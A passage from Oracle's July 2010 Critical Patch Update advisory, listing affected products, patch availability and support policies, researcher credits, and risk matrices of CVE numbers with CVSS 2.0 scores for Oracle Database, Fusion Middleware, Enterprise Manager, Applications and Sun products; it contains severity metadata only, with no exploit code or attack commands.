Middleware ]\r\n\u2022 Oracle WebLogic Server 10.0 through MP2 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 9.0, 9.1, 9.2 through MP3 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 8.1 through SP6 \t [ Fusion Middleware ]\r\n\u2022 Oracle WebLogic Server 7.0 through SP7 \t [ Fusion Middleware ]\r\n\u2022 Oracle JRockit R28.0.0 and earlier (JDK/JRE 5 and 6) \t [ Fusion Middleware ]\r\n\u2022 Oracle JRockit R27.6.6 and earlier (JDK/JRE 1.4.2, 5 and 6) \t [ Fusion Middleware ]\r\n\u2022 Oracle Business Process Management, versions 5.7.3, 6.0.5, 10.3.1, 10.3.2 \t [ Fusion Middleware ]\r\n\u2022 Oracle Enterprise Manager Grid Control 10g Release 5, version 10.2.0.5 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Grid Control 10g Release 1, version 10.1.0.6 \t [ Enterprise Manager ]\r\n\u2022 Oracle E-Business Suite Release 12, versions 12.0.4, 12.0.5, 12.0.6, 12.1.1 and 12.1.2 \t [ E-Business Suite ]\r\n\u2022 Oracle E-Business Suite Release 11i, versions 11.5.10, 11.5.10.2 \t [ E-Business Suite ]\r\n\u2022 Oracle Transportation Manager, Versions: 5.5.05.07, 5.5.06.00, 6.0.03 \t [ Oracle Transportation Management ]\r\n\u2022 PeopleSoft Enterprise Campus Solutions, version 9.0 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise CRM, versions 9.0 and 9.1 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise FSCM, versions 8.9, 9.0 and 9.1 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise HCM, versions 8.9, 9.0 and 9.1 \t [ PeopleSoft ]\r\n\u2022 PeopleSoft Enterprise PeopleTools, versions 8.49 and 8.50 \t [ PeopleSoft ]\r\n\u2022 Oracle Sun Product Suite \t [ Oracle Sun Product Suite ]\r\n\r\n\r\nPatch Availability Table and Risk Matrices\r\nProducts with Cumulative Patches\r\n\r\nStarting with the January 2010 CPU, Oracle E-Business Suite Release 11.5.10 CU2 patches are cumulative. 
For more information, please see Oracle E-Business Suite Critical Patch Update Note for July 2010.\r\n\r\nThe Oracle Database, Oracle Fusion Middleware, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite Applications (Releases 11.5.10 CU2, 12.0 and 12.1), JD Edwards EnterpriseOne, JD Edwards OneWorld Tools, PeopleSoft Enterprise Portal Applications, PeopleSoft Enterprise PeopleTools and Siebel Enterprise, and Oracle Industry Applications patches in the Updates are cumulative; patches for any of these products included in a Critical Patch Update will include all fixes for that product from the previous Critical Patch Updates.\r\nProducts with Non-Cumulative Patches\r\n\r\nOracle E-Business Suite Applications Release 11.5.10 patches are not cumulative, so Oracle E-Business Suite Applications customers should refer to previous Critical Patch Updates to identify previous security fixes they want to apply. Oracle Collaboration Suite patches were cumulative up to and including the fixes provided in the July 2007 Critical Patch Update. From the October 2007 Critical Patch Update on, Oracle Collaboration Suite security fixes are delivered using the one-off patch infrastructure normally used by Oracle to deliver single bug fixes to customers.\r\n\r\nFor each administered Oracle product, consult the documentation for patch availability information and installation instructions referenced from the following table. 
For an overview of the Oracle product documentation related to this Critical Patch Update, please refer to the Oracle Critical Patch Update July 2010 Documentation Map, My Oracle Support Note 1128882.1.\r\nProduct Group \tRisk Matrix \tPatch Availability and Installation Information\r\nOracle Database \tAppendix - Oracle Database Risk Matrix \tCritical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1\r\nOracle Fusion Middleware \tAppendix - Oracle Fusion Middleware Risk Matrix \tCritical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1\r\nOracle Enterprise Manager \tAppendix - Oracle Enterprise Manager Risk Matrix \tCritical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1\r\nOracle Applications - E-Business Suite \tAppendix - Oracle Applications, E-Business Risk Matrix \tOracle E-Business Suite Critical Patch Update Note for July 2010, My Oracle Support Note 986534.1\r\nOracle Applications - Oracle PeopleSoft Enterprise and Oracle Supply Chain Product Suite \tAppendix - Oracle Applications, PeopleSoft and Oracle Supply Chain Products Risk Matrix \tCritical Patch Update Knowledge Document for PeopleSoft Enterprise, JD Edwards EnterpriseOne, Siebel and Oracle Supply Chain Suite Products, My Oracle Support Note 1127913.1\r\nOracle Sun Product Suite \tAppendix - Oracle Sun Products Suite Risk Matrix \tCritical Patch Update July 2010 Patch Delivery Document for Oracle Sun Product Suite\r\n\r\n\r\nRisk Matrix Content\r\n\r\nRisk matrices list only security vulnerabilities that are newly fixed by the patches associated with this advisory. Risk matrices for previous security fixes can be found in previous Critical Patch Update advisories.\r\n\r\nSeveral vulnerabilities addressed in this Critical Patch Update affect multiple products. 
A vulnerability that affects multiple products will appear with the same CVE# in all risk matrices. Italics indicate vulnerabilities in code included from other product areas.\r\n\r\nSecurity vulnerabilities are scored using CVSS version 2.0 (see Oracle CVSS Scoring for an explanation of how Oracle applies CVSS 2.0). Oracle conducts an analysis of each security vulnerability addressed by a Critical Patch Update (CPU). Oracle does not disclose information about the security analysis, but the resulting Risk Matrix and associated documentation provide information about the type of vulnerability, the conditions required to exploit it, and the potential result of a successful exploit. Oracle provides this information, in part, so that customers may conduct their own risk analysis based on the particulars of their product usage. As a matter of policy, Oracle does not disclose detailed information about an exploit condition or results that can be used to conduct a successful exploit. Oracle will not provide additional information about the specifics of vulnerabilities beyond what is provided in the CPU or Security Alert notification, the Patch Availability Matrix, the readme files, and FAQs. Oracle does not provide advance notification on CPUs or Security Alerts to individual customers. Finally, Oracle does not distribute exploit code or \u201cproof-of-concept\u201d code for product vulnerabilities.\r\nWorkarounds\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible. Until you apply the CPU fixes, it may be possible to reduce the risk of successful attack by restricting network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from users that do not need the privileges may help reduce the risk of successful attack. 
Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.\r\nSkipped Critical Patch Updates\r\n\r\nOracle strongly recommends that customers apply security fixes as soon as possible. For customers that have skipped one or more Critical Patch Updates and are concerned about products that do not have security fixes announced in this CPU, please review previous Critical Patch Update advisories to determine appropriate actions.\r\nProduct Dependencies\r\n\r\nOracle products may have dependencies on other Oracle products. Hence security vulnerability fixes announced in this Critical Patch Update may affect one or more dependent Oracle products. For details regarding these dependencies and to apply patches to dependent products, please refer to Critical Patch Update July 2010 Patch Availability Document for Oracle Products.\r\nUnsupported Products and Versions\r\n\r\nOracle recommends that customers upgrade their Oracle products to a supported version. Unsupported products, releases and versions are not tested for the presence of vulnerabilities addressed by this Critical Patch Update. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities.\r\n\r\nCritical Patch Update patches are not provided for product versions that are no longer covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. We recommend that customers upgrade to the latest supported version of Oracle products in order to obtain patches.\r\nProducts in Extended Support\r\nCritical Patch Update patches are available to customers who have purchased Extended Support under the Lifetime Support Policy. 
Customers must have a valid Extended Support service contract to download Critical Patch Update patches for products in the Extended Support Phase.\r\n\r\nSupported Database, Fusion Middleware, EM Grid Control and Collaboration Suite products are patched in accordance with the Software Error Correction Support Policy explained in My Oracle Support Note 209768.1. Please review the Technical Support Policies for further guidelines regarding support policies and phases of support.\r\nOn Request Model\r\n\r\nOracle proactively creates patches only for platform/version combinations that, based on historical data, customers are likely to download for the next Critical Patch Update. We create patches for historically inactive platform/version combinations of the Oracle Database, Oracle Application Server and Enterprise Manager only if requested by customers.\r\n\r\nRefer to Critical Patch Update July 2010 Patch Availability Document for Oracle Products (My Oracle Support Note 1089044.1) for further details regarding the On Request patches.\r\nCredit Statement\r\nThe following people or organizations discovered and brought security vulnerabilities addressed by this Critical Patch Update to Oracle's attention: Maksymilian Arciemowicz of SecurityReason; Okan Basegmez of DORASEC Consulting; Check Point Software; Esteban Martinez Fayo of Application Security, Inc.; Stephen Fewer of iDefense; Roy Fox of Sentrigo; Tobias Klein; Ofer Maor of Hacktics; MarkoT of Corelan Team; Slavik Markovich of Sentrigo; Andrea Micalizzi of TippingPoint's Zero Day Initiative; Monarch2020 of unsecurityresearch; Timothy D. 
Morgan of Virtual Security Research; Martin O'Neal of Corsaire Limited; Petko Petkov of Corsaire Limited; Cody Pierce of TippingPoint DVLabs; Andrea Purificato; an Anonymous Reporter of TippingPoint's Zero Day Initiative; John S.; Piotr Samborski of Wyższa Szkoła Informatyki; Sumit Siddharth; Frank Stuart; Laszlo Toth; Janek Vind of iDefense; and Dennis Yurichev of Sentrigo.\r\nSecurity-In-Depth Contributors\r\nOracle provides recognition to people that have contributed to our Security-In-Depth program (see FAQ). People are recognized for Security-In-Depth contributions if they provide information, observations or suggestions pertaining to security vulnerability issues that result in significant modification of Oracle code or documentation in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates.\r\n\r\nFor this Critical Patch Update, Oracle recognizes Stefano Di Paola of Minded Security; Alexandr Polyakov of Digital Security; Ian de Villiers of SensePost Information Security; Chris Weber of Casaba Security; and Paul M. Wright for contributions to Oracle's Security-In-Depth program.\r\nCritical Patch Update Schedule\r\n\r\nCritical Patch Updates are typically released on the Tuesday closest to the 15th day of January, April, July and October. Starting 2011, the scheduled dates for the release of Critical Patch Updates will be on the Tuesday closest to the 17th day of January, April, July and October. 
The next four dates are:\r\n\r\n * 12 October 2010\r\n * 18 January 2011\r\n * 19 April 2011\r\n * 19 July 2011\r\n\r\nReferences\r\n\r\n * Oracle Critical Patch Updates and Security Alerts main page [ Oracle Technology Network ]\r\n * Critical Patch Update - July 2010 Documentation Map [ My Oracle Support Note 1128882.1 ]\r\n * Oracle Critical Patch Updates and Security Alerts - Frequently Asked Questions [ CPU FAQ ] \r\n * Risk Matrix definitions [ Risk Matrix Definitions ]\r\n * Use of Common Vulnerability Scoring System (CVSS) by Oracle [ Oracle CVSS Scoring ]\r\n * List of public vulnerabilities fixed in Critical Patch Updates and Security Alerts [ Oracle Technology Network ]\r\n * Software Error Correction Support Policy [ My Oracle Support Note 209768.1 ]\r\n * Previous Security Advisories Notifications for BEA products [ BEA Security Advisories ]\r\n\r\nModification History\r\n\r\n2010-July-13 \tRev 1. Initial Release\r\n\r\n\r\n\r\nAppendix - Oracle Database Server\r\n\r\nOracle Database Server Executive Summary\r\n\r\nThis Critical Patch Update contains 13 new Security fixes for the Oracle Database Server divided as follows:\r\n\r\n * 6 new security fixes for the Oracle Database Server. 4 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. 1 of these fixes is applicable to client-only installations, i.e., installations that do not have the Oracle Database Server installed.\r\n * 2 new security fixes for Oracle TimesTen In-Memory Database. Both of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n * 5 new security fixes for Oracle Secure Backup. 3 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. 
\r\n\r\n\r\nOracle Database Server Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0911 \tListener \tOracle Net \tNone \tYes \t7.8 \tNetwork \tLow \tNone \tNone \tNone \tComplete \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \t \r\nCVE-2010-0903 \tNet Foundation Layer \tOracle Net \tNone \tYes \t7.8 \tNetwork \tLow \tNone \tNone \tNone \tComplete \t9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \tSee Note 1\r\nCVE-2010-0902 \tOracle OLAP \tOracle Net \tCreate Session \tNo \t6.0 \tNetwork \tMedium \tSingle \tPartial+ \tPartial+ \tPartial+ \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \t \r\nCVE-2010-0892 \tApplication Express \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t3.2.0.00.27 \tSee Note 2\r\nCVE-2010-0900 \tNetwork Layer \tOracle Net \tNone \tYes \t2.6 \tNetwork \tHigh \tNone \tNone \tNone \tPartial \t9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \tSee Note 1\r\nCVE-2010-0901 \tExport \tOracle Net \tSelect Any Dictionary \tNo \t2.1 \tNetwork \tHigh \tSingle \tPartial \tNone \tNone \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7, 11.2.0.1 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. This bug is applicable to Windows only.\r\n 2. 
For patching information please see Critical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1.\r\n\r\nOracle Database Server Client-Only Installations\r\n\r\nThe following Oracle Database Server vulnerability included in this Critical Patch Update affects client-only installations: CVE-2010-0900.\r\n\r\n\r\nOracle TimesTen In-Memory Database Executive Summary\r\n\r\nThis Critical Patch Update contains 2 new security fixes for Oracle TimesTen In-Memory Database. Both of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle TimesTen In-Memory Database Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0873 \tData Server \tTCP \tNone \tYes \t10.0 \tNetwork \tLow \tNone \tComplete \tComplete \tComplete \t7.0.6.0 \tSee Note 1\r\nCVE-2010-0910 \tData Server \tTCP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.6.0, 11.2.1.4.1 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. For patching information please see Critical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1.\r\n\r\n\r\n\r\nOracle Secure Backup Executive Summary\r\n\r\nThis Critical Patch Update contains 5 new security fixes for Oracle Secure Backup. 3 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle Secure Backup Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? 
\tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0898 \tOracle Secure Backup \tTCP \tNone \tYes \t10.0 \tNetwork \tLow \tNone \tComplete \tComplete \tComplete \t10.3.0.1 \t \r\nCVE-2010-0907 \tOracle Secure Backup \tHTTP \tNone \tYes \t10.0 \tNetwork \tLow \tNone \tComplete \tComplete \tComplete \t10.3.0.1 \tSee Note 1\r\nCVE-2010-0899 \tOracle Secure Backup \tHTTP \tValid Session \tNo \t9.0 \tNetwork \tLow \tSingle \tComplete \tComplete \tComplete \t10.3.0.1 \tSee Note 2\r\nCVE-2010-0906 \tOracle Secure Backup \tHTTP \tValid Session \tNo \t9.0 \tNetwork \tLow \tSingle \tComplete \tComplete \tComplete \t10.3.0.1 \tSee Note 3\r\nCVE-2010-0904 \tOracle Secure Backup \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tPartial+ \tNone \t10.3.0.1 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. The CVSS Base Score of 10.0 shown in the matrix applies to Windows-based installations. For Linux, Unix and other platforms, the CVSS Base Score is 7.5, and the impacts for Confidentiality, Integrity and Availability are Partial.\r\n 2. This bug is applicable to Windows only.\r\n 3. The CVSS Base Score of 9.0 shown in the matrix applies to Windows-based installations. For Linux, Unix and other platforms, the CVSS Base Score is 6.5, and the impacts for Confidentiality, Integrity and Availability are Partial.\r\n\r\n\r\n\r\nAppendix - Oracle Fusion Middleware\r\n\r\nOracle Fusion Middleware Executive Summary\r\n\r\nThis Critical Patch Update contains 7 new security fixes for Oracle Fusion Middleware. 5 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle Fusion Middleware products may be affected by the vulnerabilities listed in the Oracle Database section. Oracle Database security fixes are not listed in the Oracle Fusion Middleware risk matrix. 
For more detailed information refer to Critical Patch Update July 2010 Patch Availability Document for Oracle Products, My Oracle Support Note 1089044.1.\r\n\r\nOracle Fusion Middleware Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0849 \tJRockit \tNone \tNone \tYes \t7.5 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tPartial+ \tR27.6.6: JRE/JDK 1.4.2, 5 and 6; R28.0.0: JRE/JDK 5 and 6; \tSee Note 1\r\nCVE-2009-3555 \tWebLogic Server \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tNone \tPartial \tPartial \t7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2 \t \r\nCVE-2010-2375 \tWebLogic Server \tHTTP \tPlugins for Apache, Sun and IIS web servers \tYes \t6.4 \tNetwork \tLow \tNone \tPartial \tPartial \tNone \t7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3 \t \r\nCVE-2010-2370 \tOracle Business Process Management \tHTTP \tBPM Process Administrator \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t5.7 MP3, 6.0 MP5, 10.3 MP2 \t \r\nCVE-2010-0835 \tWireless \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t10.1.2.3 \t \r\nCVE-2010-0081 \tApplication Server Control \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.2.3, 10.1.4.0.1 \t \r\nCVE-2010-2381 \tApplication Server Control \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.2.3, 10.1.4.0.1 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. Oracle released Java Critical Patch Update in March 2010 to address multiple vulnerabilities affecting the Java Runtime Environment. Oracle CVE-2010-0849 refers to the advisories that were applicable to JRockit from the Java Critical Patch Update. 
The CVSS score shown for CVE-2010-0849 reflects the highest score among the individual vulnerabilities fixed in JRockit. The complete list of all advisories addressed in JRockit under CVE-2010-0849 is as follows: CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088, CVE-2010-0091, CVE-2010-0092, CVE-2009-3555, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837, CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841, CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849.\r\n\r\n\r\n\r\nAppendix - Oracle Enterprise Manager Grid Control\r\n\r\nOracle Enterprise Manager Grid Control Executive Summary\r\n\r\nThis Critical Patch Update contains 1 new security fix for Oracle Enterprise Manager Grid Control. This vulnerability may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. This fix is not applicable to client-only installations, i.e., installations that do not have Oracle Enterprise Manager Grid Control installed.\r\n\r\nOracle Enterprise Manager Grid Control Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-2373 \tConsole \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t10.1.0.6, 10.2.0.5 \t \r\n \r\n\r\n\r\n\r\nAppendix - Oracle Applications\r\n\r\nOracle Applications Executive Summary\r\n\r\nThis Critical Patch Update contains 17 new security fixes for the Oracle Applications divided as follows:\r\n\r\n * 7 new security fixes for the Oracle E-Business Suite. 5 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. 
\r\n * 2 new security fixes for the Oracle Supply Chain Products Suite. 1 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n * 8 new security fixes for the Oracle PeopleSoft and JDEdwards Suite. None of these vulnerabilities may be remotely exploitable without authentication, i.e., none may be exploited over a network without the need for a username and password. \r\n\r\n\r\nOracle E-Business Suite products include Oracle Database and Oracle Fusion Middleware components that are affected by the vulnerabilities listed in the Oracle Database and Fusion Middleware sections. The exposure of Oracle E-Business Suite products is dependent on the Oracle Database and Fusion middleware versions being used. Oracle Database and Fusion Middleware security fixes are not listed in the Oracle E-Business Suite risk matrix, but since vulnerabilities affecting these versions may affect Oracle E-Business Suite products, Oracle recommends that customers apply the July 2010 Critical Patch Update to the Oracle Database and Fusion Middleware components of Oracle E-Business Suite. Refer to Oracle E-Business Suite Critical Patch Update for July 2010, My Oracle Support Note 986534.1 for more detailed information.\r\n\r\n\r\nOracle E-Business Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? 
\tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0908 \tOracle Applications Framework \tHTTP \tNone \tYes \t7.5 \tNetwork \tLow \tNone \tPartial \tPartial \tPartial \t12.1.2 \t \r\nCVE-2010-0915 \tOracle Advanced Product Catalog \tHTTP \tSpecific page access required \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0912 \tOracle Applications Framework \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0905 \tOracle Applications Manager \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.4 \t \r\nCVE-2010-0913 \tOracle Applications Manager \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0909 \tOracle Applications Framework \tHTTP \tValid session \tNo \t3.5 \tNetwork \tMedium \tSingle \tPartial \tNone \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\nCVE-2010-0836 \tOracle Knowledge Management \tHTTP \tNone \tYes \t2.6 \tNetwork \tHigh \tNone \tNone \tPartial \tNone \t11.5.10.2, 12.0.6, 12.1.2 \t \r\n \r\n\r\n\r\n\r\nOracle Supply Chain Products Suite Executive Summary\r\n\r\nThis Critical Patch Update contains 2 new security fixes for the Oracle Supply Chain Products Suite. 1 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. \r\n\r\nOracle Supply Chain Products Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? 
\tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-2372 \tOracle Transportation Management \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t6.1.1 \t \r\nCVE-2010-2371 \tOracle Transportation Management \tHTTP \tNone \tNo \t1.9 \tLocal \tMedium \tNone \tPartial \tNone \tNone \t6.1.1 \t \r\n \r\n\r\n\r\n\r\nOracle PeopleSoft and JDEdwards Suite Executive Summary\r\n\r\nThis Critical Patch Update contains 8 new security fixes for the Oracle PeopleSoft and JDEdwards Suite. None of these vulnerabilities may be remotely exploitable without authentication, i.e., none may be exploited over a network without the need for a username and password. \r\n\r\nOracle PeopleSoft and JDEdwards Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? 
\tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-2401 \tPeopleSoft Enterprise HCM - eProfile Mgr \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \tHCM 9.0 Bundle #9 \t \r\nCVE-2010-2402 \tPeopleSoft Enterprise PeopleTools \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t8.49.27 \t \r\nCVE-2010-2380 \tPeopleSoft Enterprise FSCM \tHTTP \tValid Session \tNo \t4.3 \tLocal \tLow \tSingle \tPartial \tPartial \tPartial \tSCM 8.9 Bundle #37 SCM 9.0 Bundle #30 SCM 9.1 Bundle #4 \t \r\nCVE-2010-2398 \tPeopleSoft Enterprise HCM \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial \tNone \tNone \tHCM 9.0 Bundle #12 \t \r\nCVE-2010-2379 \tPeopleSoft Enterprise HCM - Time & Labor \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial \tNone \tNone \tHCM 9.0 Bundle #13 HCM 9.1 Bundle #2 \t \r\nCVE-2010-2377 \tPeopleSoft Enterprise PeopleTools \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t8.49.27 8.50.10 \t \r\nCVE-2010-2378 \tPeopleSoft Enterprise CRM \tHTTP \tValid Session \tNo \t3.0 \tLocal \tMedium \tSingle \tPartial \tPartial \tNone \tCRM 9.0 Bundle #28 CRM 9.1 Bundle #4 \t \r\nCVE-2010-2403 \tPeopleSoft Enterprise Campus Solutions \tHTTP \tValid Session \tNo \t2.1 \tNetwork \tHigh \tSingle \tPartial \tNone \tNone \tCampus Solutions 9.0 Bundle #17 \t \r\n \r\n\r\n\r\n\r\nAppendix - Oracle Sun Products Suite\r\n\r\nOracle Sun Products Suite Executive Summary\r\n\r\nThis Critical Patch Update contains 21 new security fixes for the Oracle Sun Products Suite. 7 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. 
\r\n\r\nOracle is in the process of aligning the Sun Microsystems policies with Oracle Software Security Assurance policies and procedures. For details, please refer to Changes in security policies for the Sun product lines.\r\n\r\nOracle Sun Products Suite Risk Matrix\r\n\r\nCVE# \tComponent \tProtocol \tSubcomponent \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2010-0083 \tSolaris \tRPC \tToolTalk \tYes \t7.6 \tNetwork \tHigh \tNone \tComplete \tComplete \tComplete \t8, 9, 10, OpenSolaris \t \r\nCVE-2008-4247 \tSolaris \tFTP \tFTP Server \tYes \t7.5 \tNetwork \tLow \tNone \tPartial \tPartial \tPartial \t8, 9, 10, OpenSolaris \t \r\nCVE-2010-0916 \tSolaris \tNone \trdist \tNo \t6.2 \tLocal \tHigh \tNone \tComplete \tComplete \tComplete \t10, OpenSolaris \t \r\nCVE-2010-2385 \tSun Java System Web Proxy Server \tHTTP \tAdministration Server \tYes \t5.8 \tNetwork \tMedium \tNone \tPartial \tPartial \tNone \t4.0.13 \t \r\nCVE-2010-2392 \tSolaris \tNone \tZFS \tNo \t5.6 \tLocal \tLow \tNone \tNone \tPartial \tComplete \t10, OpenSolaris \t \r\nCVE-2010-0914 \tSun Convergence \tHTTP \tMail, Calendar, Address Book, and Instant Messaging 
